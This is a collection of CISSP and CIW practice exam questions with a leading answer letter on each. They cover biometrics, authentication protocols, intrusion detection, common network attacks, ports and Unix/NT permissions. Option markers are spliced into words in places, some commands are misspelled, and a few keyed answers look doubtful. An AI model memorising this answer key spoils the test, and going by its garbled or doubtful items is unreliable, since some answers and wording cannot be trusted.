C#CISSP4 Q.160:  By requiring the user to use more than one finger to authenticate, you can:  	^A: Provide statistical improvements in EAR.	^B: Provide statistical improvements in MTBF.	^C: Provide statistical improvements in FRR.	^D: Provide statistical improvements in ERR.
B#CISSP4 Q.161:  Which of the following is being considered as the most reliable kind of personal identification?  	^A: Token	^B: Finger print	^C: Password	^D: Ticket Granting
D#CISSP4 Q.162:  Which of the following methods is more microscopic and will analyze the direction of the ridges of the fingerprints for matching?  	^A: None of the choices.	^B: Flow direct	^C: Ridge matching	^D: Minutia matching
B#CISSP4 Q.163:  Which of the following are the types of eye scan in use today?  	^A: Retinal scans and body scans.	^B: Retinal scans and iris scans.	^C: Retinal scans and reflective scans.	^D: Reflective scans and iris scans.
B#CISSP4 Q.164:  Which of the following eye scan methods is considered to be more intrusive?  	^A: Iris scans	^B: Retinal scans	^C: Body scans	^D: Reflective scans
B#CISSP4 Q.165:  Which of the following offers greater accuracy then the others?  	^A: Facial recognition	^B: Iris scanning	^C: Finger scanning	^D: Voice recognition
B#CISSP4 Q.166:  Which of the following are the valid categories of hand geometry scanning?  	^A: Electrical and image-edge detection.	^B: Mechanical and image-edge detection.	^C: Logical and image-edge detection.	^D: Mechanical and image-ridge detection.
A#CISSP4 Q.167:  In the world of keystroke dynamics, what represents the amount of time you hold down in a particular key?  	^A: Dwell time	^B: Flight time	^C: Dynamic time	^D: Systems time
B#CISSP4 Q.168:  In the world of keystroke dynamics, what represents the amount of time it takes a person to switch between keys?  	^A: Dynamic time	^B: Flight time	^C: Dwell time	^D: Systems time.
D#CISSP4 Q.169:  Which of the following are the benefits of Keystroke dynamics?  	^A: Low cost	^B: Unintrusive device	^C: Transparent	^D: All of the choices.
B#CISSP4 Q.170:  DSV as an identification method check against users:	^A: Fingerprints	^B: Signature	^C: Keystrokes	^D: Facial expression
A#CISSP4 Q.171:  Signature identification systems analyze what areas of an individuals signature?  	^A: All of the choices EXCEPT the signing rate.	^B: The specific features of the signature.	^C: The specific features of the process of signing ones signature.	^D: The signature rate.
A#CISSP4 Q.172:  What are the advantages to using voice identification?	^A: All of the choices.	^B: Timesaving	^C: Reliability	^D: Flexibility
B#CISSP4 Q.173:  What are the methods used in the process of facial identification?  	^A: None of the choices.	^B: Detection and recognition.	^C: Scanning and recognition.	^D: Detection and scanning.
A#CISSP4 Q.174:  In the process of facial identification, the basic underlying recognition technology of facial identification involves:  	^A: Eigenfeatures of eigenfaces.	^B: Scanning and recognition.	^C: Detection and scanning.	^D: None of the choices.
C#CISSP4 Q.175:  Which of the following is a facial feature identification product that can employ artificial intelligence and can require the system to learn from experience?  	^A: All of the choices.	^B: Digital nervous system.	^C: Neural networking	^D: DSV
B#CISSP4 Q.176:  What is typically used to illustrate the comparative strengths and weaknesses of each biometric technology?  	^A: Decipher Chart	^B: Zephyr Chart	^C: Cipher Chart	^D: Zapper Chart
B#CISSP4 Q.177:  In terms of the order of effectiveness, which of the following technologies is the most affective?  	^A: Fingerprint	^B: Iris scan	^C: Keystroke pattern	^D: Retina scan
B#CISSP4 Q.178:  In terms of the order of effectiveness, which of the following technologies is the least effective?  	^A: Voice pattern	^B: Signature	^C: Keystroke pattern	^D: Hand geometry
C#CISSP4 Q.179:  In terms of the order of acceptance, which of the following technologies is the MOST accepted?  	^A: Hand geometry	^B: Keystroke pattern	^C: Voice Pattern	^D: Signature
D#CISSP4 Q.180:  In terms of the order of acceptance, which of the following technologies is the LEAST accepted?  	^A: Fingerprint	^B: Iris	^C: Handprint	^D: Retina patterns
C#CISSP4 Q.181:  Token, as a way to identify user, is subject to what type of error?  	^A: Token error	^B: Decrypt error	^C: Human error	^D: Encrypt error
C#CISSP4 Q.182:  Which of the following factors may render a token based solution unusable?  	^A: Token length	^B: Card size	^C: Battery lifespan	^D: None of the choices.
D#CISSP4 Q.183:  Memory only card works based on:  	^A: Something you have.	^B: Something you know.	^C: None of the choices.	^D: Something you know and something you have.
D#CISSP4 Q.184:  Which of the following is a disadvantage of memory only card?  ^A: High cost to develop.	^B: High cost to operate.	^C: Physically infeasible.	^D: Easy to counterfeit.
D#CISSP4 Q.185:  The word smart card has meanings of:  	^A: Personal identity token containing IC-s.	^B: Processor IC card.	^C: IC card with ISO 7816 interface.	^D: All of the choices.
C#CISSP4 Q.186:  Processor card contains which of the following components?  	^A: Memory and hard drive.	^B: Memory and flash.	^C: Memory and processor.	^D: Cache and processor.
D#CISSP4 Q.187:  Attacks on smartcards generally fall into what categories?  	^A: Physical attacks.	^B: Trojan Horse attacks.	^C: Logical attacks.	^D: All of the choices, plus Social Engineering attacks.
B#CISSP4 Q.188:  What type of attacks occurs when a smartcard is operating under normal physical conditions, but sensitive information is gained by examining the bytes going to and from the smartcard?  ^A: Physical attacks.	^B: Logical attacks.	^C: Trojan Horse attacks.	^D: Social Engineering attacks.
A#CISSP4 Q.189:  What type of attacks occurs when normal physical conditions are altered in order to gain access to sensitive information on the smartcard?  	^A: Physical attacks	^B: Logical attacks	^C: Trojan Horse attacks	^D: Social Engineering attacks
C#CISSP4 Q.190:  What type pf attacks occurs when a rouge application has been planted on an unsuspecting users workstation?	^A: Physical attacks	^B: Logical attacks	^C: Trojan Horse attacks	^D: Social Engineering attacks
A#CISSP4 Q.191:  What is an effective countermeasure against Trojan horse attack that targets smart cards?  	^A: Singe-access device driver architecture.	^B: Handprint driver architecture.	^C: Fingerprint driver architecture.	^D: All of the choices.
C#CISSP4 Q.192:  Which of the following attacks could be the most successful when the security technology is properly implemented and configured?  	^A: Logical attacks	^B: Physical attacks	^C: Social Engineering attacks	^D: Trojan Horse attacks
A#CISSP4 Q.193:  What are the valid types of one time password generator?  	^A: All of the choices.	^B: Transaction synchronous	^C: Synchronous/PIN synchronous	^D: Asynchronous/PIN asynchronous
A#CISSP4 Q.194:  What are the benefits of job rotation?  	^A: All of the choices.	^B: Trained backup in case of emergencies.	^C: Protect against fraud.	^D: Cross training to employees.
A#CISSP4 Q.195:  In order to avoid mishandling of media or information, you should consider to use:  	^A: Labeling	^B: Token	^C: Ticket	^D: SLL
A#CISSP4 Q.196:  In order to avoid mishandling of media or information, which of the following should be labeled?  	^A: All of the choices.	^B: Printed copies	^C: Tape	^D: Floppy disks
C#CISSP4 Q.197:  A method for a user to identify and present credentials only once to a system is known as:  	^A: SEC	^B: IPSec	^C: SSO	^D: SSL
A#CISSP4 Q.198:  Which of the following correctly describe the features of SSO?  	^A: More efficient log-on.	^B: More costly to administer.	^C: More costly to setup.	^D: More key exchanging involved.
B#CISSP4 Q.199:  What is a protocol used for carrying authentication, authorization, and configuration information between a Network Access Server and a shared Authentication Server?  	^A: IPSec	^B: RADIUS	^C: L2TP	^D: PPTP
C#CISSP4 Q.200:  RADIUS is de fined by which RFC?  	^A: 2168	^B: 2148	^C: 2138	^D: 2158
A#CISSP4 Q.201:  In a RADIUS architecture, which of the following acts as a client?	^A: A network Access Server.	^B: None of the choices.	^C: The end user.	^D: The authentic ation server.
C#CISSP4 Q.202:  In a RADIUS architecture, which of the following can ac as a proxy client?  	^A: The end user.	^B: A Network Access Server.	^C: The RADIUS authentication server.	^D: None of the choices.
D#CISSP4 Q.203:  What protocol was UDP based and mainly intended to provide validation of dial up user login passwords?  	^A: PPTP	^B: L2TP	^C: IPSec	^D: TACACS
C#CISSP4 Q.204:  Which of the following are proprietarily implemented by CISCO?  	^A: RADIUS+	^B: TACACS	^C: XTACACS and TACACS+	^D: RADIUS
B#CISSP4 Q.205:  In Unix, which file is required for you to set up an environment such that every used on the other host is a trusted user that can log into this host without authentication?  	^A: /etc/shadow	^B: /etc/host.equiv	^C: /etc/passwd	^D: None of the choices.
D#CISSP4 Q.206:  Information security is the protection of dat^A: Information will be protected mainly based on:	^A: Its sensitivity to the company.	^B: Its confidentiality.	^C: Its value.	^D: All of the choices.
B#CISSP4 Q.207:  Which of the following actions can increase the cost of an exhaustive attack?  	^A: Increase the age of a password.	^B: Increase the length of a password.	^C: None of the choices.	^D: Increase the history of a password.
B#CISSP4 Q.208:  Which of the following actions can make a cryptographic key more resistant to an exhaustive attack?  	^A: None of the choices.	^B: Increase the length of a key.	^C: Increase the age of a key.	^D: Increase the history of a key.
D#CISSP4 Q.209:  What attack involves actions to mimic ones identity?  	^A: Brute force	^B: Exhaustive	^C: Social engineering	^D: Spoofing
C#CISSP4 Q.210:  What attack takes advantage of operating system buffer overflows?  	^A: Spoofing	^B: Brute force	^C: DoS	^D: Exhaustive
C#CISSP4 Q.211:  What attack is primarily based on the fragmentation implementation of IP and large ICMP packet size? 	^A: Exhaustive	^B: Brute force	^C: Ping of Death	^D: Spoofing
C#CISSP4 Q.212:  Land attack attacks a target by:  	^A: Producing large volume of ICMP echos.	^B: Producing fragmented IP packets.	^C: Attacking an established TCP connection.	^D: None of the choices.
A#CISSP4 Q.213:  What attack is primarily based on the fragmentation implementation of IP?  	^A: Teardrop	^B: Exhaustive	^C: Spoofing	^D: Brute force
D#CISSP4 Q.214:  What attack floods networks with broadcast traffic so that the network is congested?  	^A: Spoofing	^B: Teardrop	^C: Brute force	^D: SMURF
D#CISSP4 Q.215:  What attack involves repeatedly sending identical e-massage to a particular address?  	^A: SMURF	^B: Brute force	^C: Teardrop	^D: Spamming	
D#CISSP4 Q.216:  Which of the following attacks focus on cracking passwords?	^A: SMURF	^B: Spamming	^C: Teardrop	^D: Dictionary
D#CISSP4 Q.217:  Man-in-the -middle attack is a real threat to what type of communication?  	^A: Communication based on random challenge.	^B: Communication based on face to face contact.	^C: Communication based on token.	^D: Communication based on asymmetric encryption.
B#CISSP4 Q.218:  Which of the following will you consider as a program that monitors data traveling over a network?  	^A: Smurfer	^B: Sniffer	^C: Fragmenter	^D: Spoofer
A#CISSP4 Q.219:  Individuals who have their sole aim as breaking into a computer system are being referred to as:  	^A: Crackers	^B: Sniffers	^C: Hackers	^D: None of the choices.
A#CISSP4 Q.220:  What technology is being used to detect anomalies?  	^A: IDS	^B: FRR	^C: Sniffing	^D: Capturing
C#CISSP4 Q.221:  IDSs verify, itemize, and characterize threats from:  	^A: Inside your organizations network.	^B: Outside your organizations network.	^C: Outside and inside your organizations network.	^D: The Internet.
D#CISSP4 Q.222:  IDS can be described in terms of what fundamental functional components?  	^A: Response	^B: Information Sources	^C: Analysis	^D: All of the choices.
D#CISSP4 Q.223:  What are the primary goals of intrusion detection systems?  	^A: Accountability	^B: Availability	^C: Response	^D: All of the choices
A#CISSP4 Q.224:  What is the most common way to classify IDSs?  	^A: Group them by information source.	^B: Group them by network packets.	^C: Group them by attackers.	^D: Group them by signs of intrusion.
B#CISSP4 Q.225:  The majority of commercial intrusion detection systems are:  	^A: Identity-based	^B: Network-based	^C: Host-based	^D: Signature-based
A#CISSP4 Q.226:  Which of the following is a drawback of Network-based IDSs?  	^A: It cannot analyze encrypted information.	^B: It is very costly to setup.	^C: It is very costly to manage.	^D: It is not effective.
A#CISSP4 Q.227:  Host-based IDSs normally utilize information from which of the following sources?  	^A: Operating system audit trails and system logs.	^B: Operating system audit trails and network packets.	^C: Network packets and system logs.	^D: Operating system alarms and system logs.
A#CISSP4 Q.228:  When comparing host based IDS with network based ID, which of the following is an obvious advantage?  	^A: It is unaffected by switched networks.	^B: It cannot analyze encrypted information.	^C: It is not costly to setup.	^D: It is not costly to manage.
D#CISSP4 Q.229:  You are comparing host based IDS with network based I^D: Which of the following will you consider as an obvious disadvantage of host based IDS?  	^A: It cannot analyze encrypted information.	^B: It is costly to remove.	^C: It is affected by switched networks.	^D: It is costly to manage.
B#CISSP4 Q.230:  Which of the following IDS inflict a higher performance cost on the monitored systems?  	^A: Encryption based	^B: Host based	^C: Network based	^D: Trusted based
D#CISSP4 Q.231:  Application-based IDSs normally utilize information from which of the following sources?  	^A: Network packets and system logs.	^B: Operating system audit trails and network packets.	^C: Operating system audit trails and system logs.	^D: Applications transaction log files.
A#CISSP4 Q.232:  What are the primary approaches IDS takes to analyze events to detect attacks?  	^A: Misuse detection and anomaly detection.	^B: Log detection and anomaly detection.	^C: Misuse detection and early drop detection.	^D: Scan detection and anomaly detection.
B#CISSP4 Q.233:  Misuse detectors analyze system activity and identify patterns. The patterns corresponding to know attacks are called:  	^A: Attachments	^B: Signatures	^C: Strings	^D: Identifications
C#CISSP4 Q.234:  Which of the following is an obvious disadvantage of deploying misuse detectors?  	^A: They are costly to setup.	^B: They are not accurate.	^C: They most be constantly updated with signatures of new attacks.	^D: They are costly to use.
C#CISSP4 Q.235:  What detectors identify abnormal unusual behavior on a host or network?  	^A: None of the choices.	^B: Legitimate detectors.	^C: Anomaly detectors.	^D: Normal detectors.
D#CISSP4 Q.236:  Which of the following are the major categories of IDSs response options?  	^A: Active responses	^B: Passive responses	^C: Hybrid	^D: All of the choices.
A#CISSP4 Q.237:  Alarms and notifications are generated by IDSs to inform users when attacks are detecte^D: The most common form of alarm is:  	^A: Onscreen alert	^B: Email	^C: Pager	^D: Icq
A#CISSP4 Q.238:  Which of the following is a valid tool that complements IDSs?  ^A: All of the choices.	^B: Padded Cells	^C: Vulnerability Analysis Systems	^D: Honey Pots
B#CISSP4 Q.239:  What tool do you use to determine whether a host is vulnerable to known attacks?  	^A: Padded Cells	^B: Vulnerability analysis	^C: Honey Pots	^D: IDS
A#CISSP4 Q.240:  What tool is being used to determine whether attackers have altered system files of executables?  	^A: File Integrity Checker	^B: Vulnerability Analysis Systems	^C: Honey Pots	^D: Padded Cells
A#CISSP4 Q.241:  What is known as decoy system designed to lure a potential attacker away from critical systems?	^A: Honey Pots	^B: Vulnerability Analysis Systems	^C: File Integrity Checker	^D: Padded Cells
B#CISSP4 Q.242:  When the IDS detect attackers, the attackers are seamlessly transfe rred to a special host. This method is called:  	^A: Vulnerability Analysis Systems	^B: Padded Cell	^C: Honey Pot	^D: File Integrity Checker
D#CISSP4 Q.243:  Most computer attacks result in violation of which of the following security properties?  	^A: Availability	^B: Confidentiality	^C: Integrity and control	^D: All of the choices.
D#CISSP4 Q.244:  What types of computer attacks are most commonly reported by IDSs?	^A: System penetration	^B: Denial of service	^C: System scanning	^D: All of the choices
D#CISSP4 Q.245:  What attack is typically used for identifying the topology of the target network?	^A: Spoofing	^B: Brute force	^C: Teardrop	^D: Scanning
B#CIW Q1. Why is password lockout an effective deterrent to cracking attempts?	^A: Passwords cannot be changed through brute-force methods	^B: A limited number of login attempts before lockout reduces the number of guesses the potential cracker can made	^C: Passwords protected in this manner are impossible to find because they are locked out of the main flow of information on the WAN	^D: Password lockout provides no real improvement over traditional locking methods.
B#CIW Q2. Which of the following choices best defines the Windows NT security account manager?	^A: It is the portion of the GINA DLL that controls security	^B: It is the database containing the identity of the users and their credentials	^C: It is the name of the machine responsible for the management of all the security of the LAN	^D: It is the interface that is responsible for logging on and user IDs
A#CIW Q3. Under the level C2 security classification, what does discretionary access control mean?	^A: Discretionary access control means that the owner of a resource must be able to use that resource	^B: Discretionary access control is the ability of the system administrator to limit the time any user spends on a computer	^C: Discretionary access control is a policy that limits the use of any resource to a group or a security profile	^D: Discretionary access control is a rule set by the security auditor to prevent others from downloading unauthorized scripts or programs.
B#CIW Q4. Michel wants to write a computer virus that will cripple UNIX systems. What is going to be the main obstacle preventing him from success?	^A: UNIX computers are extremely difficult to access illicitly over the internet, and therefore computer viruses are not an issue with UNIX systems	^B: Due to the file permission structure and the number of variations in the UNIX hardware architectures, a virus would have to gain root privileges as well as identify the hardware and UNIX flavor in use.	^C: Due to availability of effective free anti-virus tools, computer viruses are caught early and often. Michels virus would have to evade detection for it to succeed.	^D: Due to the extensive use of ANSI C in the programming of UNIX, the virus would have to mimic some of the source code used in the infected iteration of the UNIX operating system
B#CIW Q5. Which of the following best describes the problem with share permissions and share points in Windows NT?	^A: Share points must be the same value as the directory that serves the share point	^B: Share points contains permissions; and any file under the share point must possess the same permissions	^C: Share permissions are exclusive to root directories and files; they do not involve share points, which define user permissions	^D: Share points are set when connection is established, therefore the static nature of file permissions can conflict with share points if they are not set with read and write permissions for everyone.
A#CIW Q6. What do the discretionary ACL (access control list) and the system ACL in Windows NT have in common?	^A: Both share properties for storing secure object identifiers	^B: Both can grant or deny permissions to parts of the system	^C: Both are installed by default on the system in different sections of the client/server model	^D: Both are responsible for creation of the master access control list
A#CIW Q7. Winlogon loads the GINA DLL. What does the GINA DLL then do?	^A: It provides the interface for processing logon requests	^B: It creates the link to the user database for the update of the local security authority	^C: It creates the link to the master access list on the server	^D: It checks the user database for correct date/time stamps of last modification
C#CIW Q8. You must apply permissions to a file named/home/myname/myfile.txt, and you need to fulfill the following requirements:^  You want full access to the file.^  people in your group should be able to read the file.^  People in your group should not be able to write the file.^  People outside of your group should be denied access to the file.^  What are the most secure permissions you would apply to the file?	^A. Chage 700/home/myname/myfile.txt	^B. Chage 744/home/myname/myfile.txt	^C. Chmod 640/home/myname/myfile.txt	^D. Chmod 064/home/myname/myfile.txt
A#CIW Q10. What are the security issues that arise in the use of the NFS (Network File System)?	^A: Synchronization of user and group IDs is poor, so it is easy to spoof trusted hosts and user names.	^B: The lack of logging in one place or on one machine, and the multiple logs this then requires, can create bottlenecks	^C: The possibility arises for Cleartext passwords to be sniffed on the network if it does not use Secure RPC.	^D: NFS uses a weak authentication scheme and transfers information in encrypted form
B#CIW Q11. What is the major security issue with standard NIS (Network Information System)?	^A: It is impossible to enforce a centralized login scheme	^B: NIS provides no authentication requirement in its native state	^C: There is no way to encrypt data being transferred	^D: NIS is a legacy service and, as such, is only used in order, less secure operating systems and networks
B#CIW Q12. In a Linux system, how do you stop the POP3, IMAPD, and FTP services?	^A: By changing the permissions on the configuration file that controls the service (/sbin/inetd), then recompiling /etc/inetd.config	^B: By commenting out the service using the # symbol in the text file /etc/inetd.conf, then restarting the inetd daemon	^C: By recompiling the system kernel, making sure you have disabled that service	^D: By commenting out the service using the $ symbol in the text file /etc/inetd.conf, then restarting the inetd daemon.
A#CIW Q13. Which of the following choices lists the ports that Microsoft internal networking uses that should be blocked from outside access?	^A: UDP 137 and 138, and TCP 139	^B: Ports 11, 112, and 79	^C: UDP 1028, 31337 and 6000	^D: Port 80, 134 and 31337
A#CIW Q14. What is the best way to keep employees on a LAN from unauthorized activity or other mischief?	^A: Reduce each users permissions to the minimum needed to perform the tasks required by his or her job	^B: Limit the number of logins available to all users to one at a time	^C: Limit the number of files that any one user can have open at any given time	^D: Implement a zero-tolerance policy in regard to employees who load games or other unauthorized software on the company's computers
C#CIW Q15. What is a spoofing attack?	^A: A hacker pretends to be the superuser and spoofs a user into allowing him into the system	^B: A hacker calls a user and pretends to be a system administrator in order to get the users password	^C: A computer (or network) pretends to be a trusted host (or network)	^D: A hacker gains entrance to the building where the network resides and accesses the system by pretending to be an employee
B#CIW Q16. Abjee is going to log on to his network. His network does not employ traffic padding mechanisms. Why will it be easy for someone to steal his password?	^A: Because his password could be more than two weeks old	^B: Because of he predictability of the length of the login and password prompts	^C: Because the Cleartext user name and password are not encrypted	^D: Because there is no provision for log analysis without traffic padding, thus no accountability when passwords are lost
D#CIW Q17. In a typical corporate environment, which of the following resources demands the highest level of security on the network?	^A: Purchasing	^B: Engineering	^C: Sales	^D: Accounting
A#CIW Q18. Luke is documenting all of his network attributes. He wants to know the type of network-level information that is represented by the locations of access panels, wiring closets and server rooms. Which of the following is the correct term for this activity?	^A: Network mapping	^B: IP service routing	^C: Router and switch designing	^D: War dialing
D#CIW Q19. Which service, command or tool allows a remote user to interface with a system as if he were sitting at the terminal?	^A: Host	^B: Finger	^C: SetRequest	^D: Telnet
C#CIW Q20. Which command, tool or service on a UNIX network converts names to IP addresses and IP addresses to names, and can also specify which servers are mail servers?	^A: Port scanner	^B: Traceroute	^C: Host	^D: Nslookup
B#CIW Q21. Kerstin connected to an e-commerce site and brought a new mouse pad with her credit card for $5.00 plus shipping and handling. She never received her mouse pad so she called her credit card company to cancel the transaction. She was not charged for the mouse pad, but she received multiple charges she knew nothing about. She tried to connect to the site again but could not find it. Which type of hacking attack occurred?	^A: Denial-of-service attack	^B: Hijacking attack	^C: Illicit server attack	^D: Spoofing attack
B#CIW Q22. Which service, tool or command allows a remote or local user to learn the directories or files that are accessible on the network?	^A: Traceroute	^B: Share scanner	^C: Port scanner	^D: Ping scanner
D#CIW Q23. Which type of attack utilizes an unauthorized service or daemon running on your system to send out information to a hacker that can be used to further compromise the system?	^A: Virus attack	^B: Hijacking attack	^C: Man-in-the-middle attack	^D: Illicit server attack
D#CIW Q24. Which type of attack uses a simple or complex program that self-replicates and/or deposits a payload on a remote or local computer?	^A: Dictionary attack	^B: Hijacking attack	^C: Illicit server attack	^D: Virus attack
A#CIW Q25. Which type of attack can use a worm or packet sniffer to crash systems, causing low resources and/or consuming bandwidth?	^A: Denial-of-service attack	^B: Illicit server attack	^C: Man-in-the-middle attack	^D: Virus attack
C#CIW Q26. Which service, command or tool discovers the IP addresses of all computers or routers between two computers on an internet/intranet network?	^A: Whois	^B: Port scanner	^C: Traceroute	^D: Nslookup
D#CIW Q27. Which tool, service or command will enable you to learn the entire address range used by an organization or company?	^A: Traceroute	^B: Nslookup	^C: Port scanner	^D: Ping scanner
A#CIW Q28. What is the final step in assessing the risk of network intrusion from an internal or external source?	^A: Using the existing management and control architecture	^B: Evaluating the existing perimeter and internal security	^C: Analyzing, categorizing and prioritizing resources	^D: Considering the business concerns
B#CIW Q29. A file is replace by another file that provides the same service but also has a secret operation that is meant to subvert security. What is this type of attack called?	^A: A buffer overflow attack	^B: A Trojan attack	^C: A denial-of-service attack	^D: An illicit server attack
B#CIW Q30. Most hackers run two services first learn information about a computer or Windows server attached to the Internet or intranet. These services enable hackers to find weaknesses in order to infiltrate the computer or network. Which one of the following choices lists the two services?	^A: Ping and traceroute	^B: Nslookup and whois	^C: Whois and ping	^D: Nslookup and traceroute
A#CIW Q31. What common target can be reconfigured to disable an interface and provide inaccurate IP addresses over the Internet?	^A: Routers	^B: E-mail servers	^C: DNS servers	^D: Databases
B#CIW Q32. Lucy obtains the latest stable versions of server, services or applications. Which type of attack does this action help to prevent?	^A: Dictionary attack	^B: Buffer overflow attack	^C: Trojan attack	^D: Illicit server attack
A#CIW Q33. What host-level information would you want to obtain so you can exploit defaults and patches?	^A: Servers	^B: Routers and switches	^C: Databases	^D: Firewall types
D#CIW Q34. Which of the following is a way to get around a firewall to intrude into a secure network from a remote location?	^A: IP services	^B: Active ports	^C: Identified network topology	^D: Modem banks
D#CIW Q35. You notice that your FTP service reveals unnecessary information about your server. Which of the following is the most efficient solution to this problem?	^A: Filter out the login banner using a packet filter	^B: Disable the service in question	^C: Place the service behind the firewall	^D: Disable the login banner for the service
C#CIW Q36. What is the most common security problem on a client/server network?	^A: Outdated software	^B: Old login accounts	^C: Non-secured ports	^D: Browser flaws
C#CIW Q37. While assessing the risk of a network, which step are you conducting when you determine whether the network can differentiate itself from other networks?	^A: Considering the business concerns	^B: Analyzing, categorizing and prioritizing resources	^C: Evaluating the existing perimeter and internal security	^D: Using the existing management and control architecture
A#CIW Q38. Which type of attack occurs when a hacker obtains passwords and other information from legitimate transactions?	^A: Man-in-the-middle attack	^B: Denial-of-service attack	^C: Dictionary attack	^D: Illicit server attack
D#CIW Q39. Which of the following layers of TCP/IP stacks is the most difficult to secure?	^A: Physical	^B: Network	^C: Transport	^D: Application
B#CIW Q40. Kerstin wants to improve the security on her FTP server. She is worried about password-sniffing attacks. Which of the following is the best action for her to take?	^A: Disable anonymous logins	^B: Allow only anonymous logins	^C: Configure the firewall to block port 21	^D: Place the FTP server outside of the firewall
D#CIW Q41. What is the primary security problem with FTP?	^A: Anonymous logins do not require a password	^B: Damaging programs can be executed on the client	^C: Damaging programs can be executed on the server	^D: The login name and password are sent to the server in cleartext
A#CIW Q42. Which type of port is used by a client when it establishes a TCP connection?	^A: Ephemeral	^B: Well-known	^C: Reserved	^D: Static
B#CIW Q43. Which system provides relay services between two devices?	^A: Proxy server	^B: Gateway	^C: VPN	^D: Screening router
A#CIW Q44. Which port does FTP use for a control connection?	^A: 21	^B: 25	^C: 53	^D: 162
C#CIW Q45. Which port is used by DNS when conducting zone transfers?	^A: UDP port 53	^B: UDP port 23	^C: TCP port 53	^D: TCP port 23
D#CIW Q46. What is the primary security risk in SNMP?	^A: Login names and passwords are not encrypted	^B: Damaging programs can be executed on the client	^C: Damaging programs can be executed on the server	^D: Passwords and Data is transferred in Cleartext
B#CIW Q47. Ulf wants to ensure that a hacker cannot access his DNS zone files. What is the best action for his to take?	^A: Filter TCP port 23	^B: Configure the firewall to block zone transfers and accept zone transfer requests only from specific hosts	^C: Configure all routers to block zone transfers and encrypt zone transfer messages	^D: Disable Nslookup
D#CIW Q48. What is a Windows NT equivalent to a UNIX daemon?	^A: A thread	^B: A process	^C: A protocol	^D: A service
A#CIW Q49. Which of the following is the correct order of events in the termination of a TCP/IP connection?	^A: Active close, passive close, FIN, ACK	^B: Passive close, Active close, FIN, ACK	^C: Active close, passive close, ACK, FIN	^D: Passive close, active close, ACK, FIN
B#CIW Q50. Which protocol is normally used to communicate errors or other conditions at the IP layer, but has also been used to conduct denial-of-service attacks?	^A: TCP	^B: ICMP	^C: SNMP	^D: UDP
D#CIW Q51. Which of the following will help control unauthorized access to an e-mail server?	^A: Disable CGI scripts	^B: Prohibit relaying	^C: Limit the number of e-mail messages a given account can receive in a day	^D: Scan all e-mail messages at the firewall or SMTP server 
D#CIW Q52. What is the correct order of events in the establishment of a TCP/IP connection?	^A: Passive open, active open, ACK	^B: Passive open, ACK, active open	^C: Active open, active open, ACK	^D: Active open, passive open, ACK
B#CIW Q53. You are using a packet sniffer to capture transmissions between two remote systems. However, you find that you can only capture packets between your own system and another. What is the problem?	^A: You have configure your filter incorrectly	^B: You are sniffing packets in a switch network	^C: Tcpdump captures packets only between your host and another host	^D: Your system does not have its default gateway configured
D#CIW Q54. How might a hacker cause a denial-of-service attack on an FTP server?	^A: By executing a damaging program on the server	^B: By initiating an ICMP flood	^C: By initiating a broadcast storm	^D: By filling the servers hard drive to capacity
B#CIW Q55. Which type if port is used by HTTP for the control connection?	^A: Ephemeral	^B: Well-known	^C: Dynamic	^D: UDP
C#CIW Q56. Which security feature does NNTP possess that SMTP does not?	^A: Dynamic port assignment	^B: Separate control and data ports	^C: Usable in conjunction with SSL	^D: Strict bounds checking on arrays
C#CIW Q57. Laura is a system administrator who wants to block all NNTP traffic between her network and the Internet. How should she configure her firewall?	^A: Disable anonymous logins in the NNTP configuration manager	^B: Configure all routers to block broadcast packets	^C: Configure the firewall to block port 119	^D: Configure the firewall to block port 25
A#CIW Q58. Luke must advise his users about which client to employ when accessing remote systems. Which of the following is a connection-oriented protocol that can contain unencrypted password information from Telnet sessions?	^A: TCP	^B: TTP	^C: HTTP	^D: UDP
B#CIW Q59. What is the term for the process of replacing source IP addresses with false IP addresses?	^A: Hijacking	^B: Spoofing	^C: Spamming	^D: Brute force
A#CIW Q60. Which ports are used by SNMP?	^A: UDP ports 161 and 162	^B: UDP ports 20 and 21	^C: TCP ports 161 and 162	^D: TCP ports 20 and 21
A#CIW Q61. What is the most common type of network attack?	^A: Denial-of-service attacks, because they are easy to perpetrate	^B: Insider attacks, because most resources are spent defending against outside attacks	^C: Packet sniffing and other benign attacks, because there is no way to defend against them	^D: Brute-force password attacks, because most users do not employ good passwords
B#CIW Q62. What is the different between digital signature mechanisms and simple encryption?	^A: Digital signatures are generally 128-bit encryption, whereas simple encryption is generally 56 bits	^B: Digital signatures are verified by third parties that vouch for the veracity of the sender and the contents	^C: Digital signatures carry timestamps, whereas standard encryption does not	^D: Standard encryption mechanisms have no provision for traffic padding to thwart password sniffers
A#CIW Q63. What is problematic about a new NTFS partition?	^A: The everyone group has unrestricted access permissions on the new partition, thus restricting access to the new partition become problematic.	^B: NTFS cannot read user/group permissions tables on FAT systems, thus the group permissions file must be kept in the same file format as the new partition	^C: The admin group has exclusive access to the new partition, thus getting client machines to see the new partitions can be problematic	^D: NTFS allows only the root user to access it, thus it is difficult to divide the new partition
A#CIW Q64. Why is the rlogin command dangerous to network security?	^A: Remote logins are a security threat regardless of the protocol and should be avoided	^B: There is no way to prevent the user who successfully uses rlogin from becoming root	^C: The rlogin command has a long history of buffer overflows that has not been corrected	^D: If one system that has extensive rlogin privileges to other systems is compromised, then a hacker can spread throughout the entire network
C#CIW Q65. Which of the following choices lists the components that make up security descriptions for Windows NT objects?	^A: The user name, the password and the object-owner security identifier	^B: The UNAME the access profile of the object-owner SID, and confirmation by the system access control list	^C: The object-owner SID, the discretionary access control, the DACL, and the group SID	^D: The user name, the object identifiers, the set user identifier, and the time/date stamp
B#CIW Q66. What is the major security problem with the SUID/SGID programs or utilities?	^A: The root account must be in order to utilize programs set this way	^B: These permission in a program in a program can temporarily grant root privileges to anyone	^C: SUID programs are not removed immediately from the swap/paging area, which results in a clear security risk	^D: The SGID is a clear violation of good security practice and is only used as a result of the SUID
A#CIW Q67. Carol wants to choose a strong password for her computer. Which of the following should she include in her password?	^A: A mixture of uppercase and lowercase letters, symbols and numbers	^B: An arcane phrase only she can remember	^C: An incorrect spelling of a word or a phrase	^D: A mixture of random words that form non-sense
B#CIW Q68. Why would Ulf refuse to run the command chmod-Are 777/home/ulf?	^A: The command will copy all his files to a public directory	^B: The command will allow everyone to read, write and execute all files in his directory	^C: The command will create problems when his profile file initialises his user settings	^D: The command is known to have security breaches associated with it, and should be avoided.
C#CIW Q69. Which command, service or tool allows you to imitate a secondary DNS server in order to obtain its records via a zone transfer?	^A: Traceroute	^B: Ping scanner	^C: Nslookup	^D: Host
C#CIW Q70. Which type of attack uses a database or databases to guess a password in order to gain access to a computer system?	^A: Hijacking attack	^B: Virus attack	^C: Dictionary attack	^D: Man-in-the-middle attack
